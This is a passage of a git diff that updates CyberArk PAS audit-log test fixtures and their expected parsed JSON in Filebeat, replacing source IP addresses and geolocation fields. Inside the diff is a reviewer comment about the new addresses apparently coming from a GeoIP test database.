@@ -344,7 +324,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMAppUsers",
- "cyberarkpas.audit.station": "35.192.121.42",
+ "cyberarkpas.audit.station": "67.43.156.12",
 "cyberarkpas.audit.target_user": "PSMApp_ASR-WIN",
 "cyberarkpas.audit.timestamp": "Mar 10 14:19:16",
 "event.action": "add group member",
@@ -357,25 +337,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 4257,
+ "log.offset": 4250,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "35.192.121.42"
+ "67.43.156.12"
 ],
 "service.type": "cyberarkpas",
- "source.address": "35.192.121.42",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.6583,
- "source.geo.location.lon": -77.2481,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "35.192.121.42",
+ "source.address": "67.43.156.12",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -391,7 +369,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PVWAGWAccounts",
- "cyberarkpas.audit.station": "35.192.121.42",
+ "cyberarkpas.audit.station": "67.43.156.12",
 "cyberarkpas.audit.target_user": "PSMGw_ASR-WIN",
 "cyberarkpas.audit.timestamp": "Mar 10 14:19:16",
 "event.action": "add group member",
@@ -404,25 +382,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 4858,
+ "log.offset": 4850,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "35.192.121.42"
+ "67.43.156.12"
 ],
 "service.type": "cyberarkpas",
- "source.address": "35.192.121.42",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.6583,
- "source.geo.location.lon": -77.2481,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "35.192.121.42",
+ "source.address": "67.43.156.12",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -435,11 +411,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:38Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Add Group Member",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_VAGRANT\n \n \n 81.32.170.205\n \n \n \n \n \n Add Group Member\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_VAGRANT\n \n \n 67.43.156.14\n \n \n \n \n \n Add Group Member\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMAppUsers",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.target_user": "PSMPApp_VAGRANT",
 "cyberarkpas.audit.timestamp": "Mar 11 08:59:38",
 "event.action": "add group member",
@@ -452,26 +428,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 5461,
+ "log.offset": 5452,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -484,11 +457,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:38Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Add Group Member",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_VAGRANT\n \n \n 81.32.170.205\n \n \n \n \n \n Add Group Member\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 08:59:38\n 2021-03-11T16:59:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_VAGRANT\n \n \n 67.43.156.14\n \n \n \n \n \n Add Group Member\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PVWAGWAccounts",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.target_user": "PSMPGW_VAGRANT",
 "cyberarkpas.audit.timestamp": "Mar 11 08:59:38",
 "event.action": "add group member",
@@ -501,26 +474,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 6945,
+ "log.offset": 6934,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -533,11 +503,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:17Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Add Group Member",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_SSH\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PVWAGWAccounts\n PSMPGW_SSH\n \n \n 81.2.69.143\n \n \n \n \n \n Add Group Member\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PVWAGWAccounts",
- "cyberarkpas.audit.station": "34.71.250.247",
+ "cyberarkpas.audit.station": "81.2.69.143",
 "cyberarkpas.audit.target_user": "PSMPGW_SSH",
 "cyberarkpas.audit.timestamp": "Mar 14 05:57:17",
 "event.action": "add group member",
@@ -550,23 +520,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 8433,
+ "log.offset": 8420,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "34.71.250.247"
+ "81.2.69.143"
 ],
 "service.type": "cyberarkpas",
- "source.address": "34.71.250.247",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "34.71.250.247",
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -579,11 +552,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:17Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Add Group Member",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_SSH\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:17\n 2021-03-14T12:57:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMAppUsers\n PSMPApp_SSH\n \n \n 81.2.69.143\n \n \n \n \n \n Add Group Member\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMAppUsers",
- "cyberarkpas.audit.station": "34.71.250.247",
+ "cyberarkpas.audit.station": "81.2.69.143",
 "cyberarkpas.audit.target_user": "PSMPApp_SSH",
 "cyberarkpas.audit.timestamp": "Mar 14 05:57:17",
 "event.action": "add group member",
@@ -596,23 +569,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 9913,
+ "log.offset": 9896,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "34.71.250.247"
+ "81.2.69.143"
 ],
 "service.type": "cyberarkpas",
- "source.address": "34.71.250.247",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "34.71.250.247",
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -625,11 +601,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:21Z",
 "cyberarkpas.audit.issuer": "Administrator",
 "cyberarkpas.audit.message": "Add Group Member",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMP_ADB_AppUsers\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n 34.71.250.247\n \n \n \n \n \n Add Group Member\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:21\n 2021-03-14T12:57:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 265\n Add Group Member\n Info\n Administrator\n Add Group Member\n PSMP_ADB_AppUsers\n PSMP_ADB_asr-cyberark-psm-ssh\n \n \n 81.2.69.143\n \n \n \n \n \n Add Group Member\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMP_ADB_AppUsers",
- "cyberarkpas.audit.station": "34.71.250.247",
+ "cyberarkpas.audit.station": "81.2.69.143",
 "cyberarkpas.audit.target_user": "PSMP_ADB_asr-cyberark-psm-ssh",
 "cyberarkpas.audit.timestamp": "Mar 14 05:57:21",
 "event.action": "add group member",
@@ -642,23 +618,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 11389,
+ "log.offset": 11368,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "34.71.250.247"
+ "81.2.69.143"
 ],
 "service.type": "cyberarkpas",
- "source.address": "34.71.250.247",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "34.71.250.247",
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log b/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log
index 7b0f9be88a0a..bf1f880b4479 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log
@@ -1,2 +1,2 @@
-<5>1 2021-03-10T17:59:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:48","IsoTimestamp":"2021-03-10T17:59:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
-<5>1 2021-03-10T22:19:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:23","IsoTimestamp":"2021-03-10T22:19:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:48","IsoTimestamp":"2021-03-10T17:59:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
+<5>1 2021-03-10T22:19:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
14:19:23","IsoTimestamp":"2021-03-10T22:19:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"266","Desc":"Remove Group Member","Severity":"Info","Issuer":"Administrator","Action":"Remove Group Member","SourceUser":"PSMMaster","TargetUser":"Administrator","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Group Member","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log-expected.json
index 9fe62e5d167d..14455bbf1e46 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/266_remove_group_member.log-expected.json
@@ -9,7 +9,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMMaster",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.target_user": "Administrator",
 "cyberarkpas.audit.timestamp": "Mar 10 09:59:48",
 "event.action": "remove group member",
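Review bot: The replacement Station values on the two added lines, 67.43.156.14 and 67.43.156.12, are still globally routable public addresses rather than RFC 5737 documentation addresses, so the fixture trades one set of real-world IPs for another; the same applies to 67.43.156.14 on the added line in 273_remove_owner.log. The regenerated expected output resolves these to Bhutan (27.5, 90.5) and 81.2.69.143 to London, which looks like the contents of a GeoIP test database rather than live geolocation, and that coupling between the chosen addresses and the database the test pipeline runs against is not stated anywhere in the diff. It would help future fixture authors to record this in the test directory, for example a README line such as `Station addresses in these fixtures (67.43.156.12, 67.43.156.14, 81.2.69.143) are taken from the GeoIP test database used by the pipeline tests; do not substitute real-world IPs.`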
@@ -29,19 +29,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -57,7 +54,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMMaster",
- "cyberarkpas.audit.station": "35.192.121.42",
+ "cyberarkpas.audit.station": "67.43.156.12",
 "cyberarkpas.audit.target_user": "Administrator",
 "cyberarkpas.audit.timestamp": "Mar 10 14:19:23",
 "event.action": "remove group member",
@@ -70,25 +67,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 607,
+ "log.offset": 606,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "35.192.121.42"
+ "67.43.156.12"
 ],
 "service.type": "cyberarkpas",
- "source.address": "35.192.121.42",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.6583,
- "source.geo.location.lon": -77.2481,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "35.192.121.42",
+ "source.address": "67.43.156.12",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log b/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log
index ea1458e58749..c03e8c662a93 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log
@@ -1 +1 @@
-<5>1 2021-03-10T17:59:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:33","IsoTimestamp":"2021-03-10T17:59:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"273","Desc":"Remove Owner","Severity":"Info","Issuer":"Administrator","Action":"Remove Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Owner","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:33","IsoTimestamp":"2021-03-10T17:59:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"273","Desc":"Remove Owner","Severity":"Info","Issuer":"Administrator","Action":"Remove Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMSessions","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Owner","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log-expected.json
index 6fd2e81ca83c..78850be98327 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/273_remove_owner.log-expected.json
@@ -10,7 +10,7 @@
 "cyberarkpas.audit.safe": "PSMSessions",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "Administrator",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 09:59:33",
 "event.action": "remove owner",
 "event.code": "273",
@@ -29,19 +29,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log b/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log
index 2ea7c7cf1326..995c9971202c 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/294_store_password.log
@@ -2,8 +2,8 @@
 <5>1 2021-03-08T18:24:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:49","IsoTimestamp":"2021-03-08T18:24:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"10.0.1.20"}}}
 <5>1 2021-03-08T19:20:02Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 11:20:02","IsoTimestamp":"2021-03-08T19:20:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountA"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"26"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615231182"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1614785704"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating 
System"},{"Name":"Index","Value":"1"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}}
 <5>1 2021-03-10T14:38:57Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 06:38:57","IsoTimestamp":"2021-03-10T14:38:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Groups\\WindowsGroup","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WindowsDesktopLocalAccountsRotationalPolicy"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"LastSuccessChange","Value":"1615387136"},{"Name":"CurrInd","Value":"1"}]}}}}
-<5>1 2021-03-10T17:58:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:06","IsoTimestamp":"2021-03-10T17:58:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMServer","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}}
-<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store 
password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}}
